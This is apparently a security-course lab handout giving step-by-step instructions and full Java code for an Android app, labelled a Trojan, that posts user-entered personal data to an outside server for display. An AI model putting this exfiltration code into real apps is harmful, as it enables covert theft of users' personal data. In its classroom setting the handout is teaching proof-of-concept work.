Project 9x: Making a Data-Stealing Android Trojan (15 pts. extra credit)

What You Need for This Project

Purpose

To make a very simple app that asks for data and posts it to the Web. This is useful to add to vulnerable apps as Trojan code for proof-of-concepts, when demonstrating app vulnerabilities.

Making a New Project

Launch Android Studio. Click File, "New Project".

Name the project "Web-Trojan-YOURNAME", as shown below.

Click Next.

In the "Select a form factor" page, click Next.

In the "Add an activity to Mobile" page, click Next.

In the "Select a form factor" page, click Next.

In the "Choose options for your new file" page, click Finish.

Changing the Layout

In the bottom center pane, click the Text tab.

In the center pane, XML text appears, starting with "<RelativeLayout".

Highlight all that text, as shown below, and delete it.

Replace it with the text below. This makes a simple vertical layout of fields.

<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
              android:orientation="vertical"
              android:layout_width="match_parent"
              android:layout_height="match_parent">
    <EditText
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:id="@+id/ssn"
            android:hint="Enter Personal Data to be Stolen, Without Spaces"
            android:textSize="18dp" />
    <Button
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:id="@+id/submit_btn"
            android:text="Submit"
            android:textSize="18dp" />
    <TextView
            android:layout_width="match_parent"
            android:layout_height="wrap_content"
            android:id="@+id/response"
            android:textSize="18dp" />
</LinearLayout>
At the bottom center, click the Design tab. Then click the Text tab.

On the right side, the new layout and text appears, as shown below.

Configuring the Activity

In the center, near the top, click the MainActivity.java tab.

You see code like this:

Expand the Import section and highlight it like this:

Delete it and replace it with this text, to bring in the libraries we will need.

import android.os.Bundle;
import android.app.Activity;
import android.widget.Button;
import android.widget.EditText;
import android.widget.TextView;
import android.view.View;
import org.apache.http.client.methods.HttpPost;
import org.json.JSONException;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.client.HttpClient;
import org.apache.http.HttpResponse;
import org.apache.http.HttpEntity;
import java.io.InputStream;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import android.os.AsyncTask;
import org.json.JSONObject;
import org.apache.http.StatusLine;
import org.json.JSONArray;
import java.text.NumberFormat;
Your screen should now look like this:

Highlight all the code inside the "public class MainActivity extends ActionBarActivity {" object, as shown below:

Delete it and replace it with this text, replacing YOURNAME with your own name, without spaces.

This code sends an HTTP POST request to my server, which can display the stolen data.


    String ssn="";
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        Button submitButton = (Button)this.findViewById(R.id.submit_btn);

        submitButton.setOnClickListener(new Button.OnClickListener(){
            public void onClick(View v) {
                EditText ssnName = (EditText) findViewById(R.id.ssn);
                ssn=ssnName.getText().toString();
                String url="http://attack.samsclass.info?TROJAN_YOURNAME="+ssn;
                new ReadJSONFeed().execute(url);
            }
        });
    }
    private class ReadJSONFeed extends AsyncTask<String, String, String> {
        protected void onPreExecute() {}
        @Override
        protected String doInBackground(String... urls) {
            HttpClient httpclient = new DefaultHttpClient();
            StringBuilder builder = new StringBuilder();
            HttpPost httppost = new HttpPost(urls[0]);
            try {
                HttpResponse response = httpclient.execute(httppost);
                StatusLine statusLine = response.getStatusLine();
           } catch (Exception e) {
                e.printStackTrace();
            }
            return builder.toString();
        }
        protected void onPostExecute(String result) {
           TextView resp = (TextView) findViewById(R.id.response);
           resp.setText("Stolen data will appear in 1 minute at http://attack.samsclass.info/smali.htm");
        }
    }
Your screen should look like this, (with YOURNAME replaced by your own name).

In the file, find the word "ActionBarActivity", as shown below:

Change "ActionBarActivity" to "Activity", as shown below:

Adding the INTERNET Permission to the Manifest

On the left side, expand manifests and double-click AndroidManifest.xml

Add this line after the manifest opening tag, as shown below:

<uses-permission android:name="android.permission.INTERNET"/>

Starting the Emulator

If you are using Genymotion, launch your emulator. If you are using Windows, I think you need to manually connect to it with adb.

Running the App

Click Run, "Run 'app'".

If error messages appear in the bottom pane, fix the errors and run the app again.

When your app works, in the "Choose a running device" screen, click OK.

The app should launch, as shown below.

Type in your name, as shown below.

Saving a Screen Image

Make sure the Android emulator running, with YOURNAME entered, as shown above.

Save a full-desktop image.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 9xa", replacing "YOUR NAME" with your real name.

Viewing the Stolen Data

In the Android app, click Submit.

A message appears, telling you where the stolen data will appear, as shown below.

On your computer, open a Web browser and go to

http://attack.samsclass.info/smali.htm

Your name should appear, as shown below. If it does not, wait a minute and refresh the page.

Saving a Screen Image

Make sure the Web page contains YOURNAME, as shown above.

Save a full-desktop image.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 9xb", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the images to to cnit.128sam@gmail.com with the subject line: Proj 9x from YOUR NAME

Source

Accessing Web Services Through Android Apps
Last modified 2-23-15 8:10 am